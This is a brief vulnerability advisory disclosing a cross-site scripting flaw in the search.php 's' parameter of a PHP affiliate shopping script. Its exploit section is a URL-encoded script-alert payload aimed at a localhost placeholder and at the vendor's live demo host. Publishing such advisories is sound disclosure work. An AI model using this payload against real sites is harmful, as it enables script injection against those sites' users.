Shopzilla Affiliate Script suffers from a cross site scripting vulnerability.
a1f369fe3b3e62eb5864551bd2a925f0e4cc0a0333efba4d603d40ca910cedd7
# [x] Author: Andrea Bocchetti
# [x] Homepage : http://www.geekit.it
// Software Info
# [x] Name : Shopzilla Affiliate Script PHP
# [x] Vendor : http://www.v-eva.com/
# [x] Price : 70.95 USD
# [x] Exploit :
#
# http://localhost/search.php?s=(XSS)
#
http://www.shopping.v-eva.com/search.php?s=%3Cscript%3Ealert(/XSS/)%3C/script%3E
#EOF